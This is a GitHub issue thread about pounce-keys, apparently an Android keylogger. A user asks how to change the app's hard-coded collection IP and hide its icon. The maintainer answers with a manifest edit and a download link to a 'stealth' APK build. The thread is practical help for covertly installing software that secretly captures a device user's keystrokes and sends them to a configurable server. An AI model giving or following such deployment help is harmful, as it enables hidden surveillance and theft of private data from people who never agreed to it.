### ISSUE TITLE
Couldn't find "192.168.0.135" ip to change after opening Pounce-Keys.apk in APK Editor Studio in 2.0 release

### ISSUE THREAD

**Issue by 2picodin9** [NullPounce/pounce-keys#4]

**Comment by 2picodin9** [comment]
@NullPounce please help me to address this issue!

**Comment by 2picodin9** [comment]
Ops! I found out needed ip address to change in Pounce-Keys.apk. I didn't dowload lateast version of it so i couldn't found it

**Comment by 2picodin9** [comment]
@NullPounce but i can't hide app icon from release 2.0

**Comment by NullPounce** [comment]
what version of android? and sorry yes that has not been 100% implemented, whole recode, compare the older mainfest file as i think being exported to true is the issue, seen an error about android 10 and under but i still need to implement that, thank you.

```
<application
		android:allowBackup="true"
		android:icon="@drawable/bac"
		android:label="@string/app_name"
		android:theme="@style/AppTheme"
		android:resizeableActivity = "true">
		<activity
			android:name=".MainActivity"
			android:label="@string/app_name"
			android:exported="false">
			<intent-filter>
```

try changing "android:exported="false">"
to
android:exported="true">

and let me know if that helps, if not regardless i have some genymotion to spin up ha ha

**Comment by NullPounce** [comment]
thank you for the notice very much! I have made a updated version and release right away. :)

here's a direct link to the new apk
https://github.com/NullPounce/pounce-keys/releases/download/2.1/pounce-keys-2.1-stealth.apk

release notes show the edits, let me know if this works.
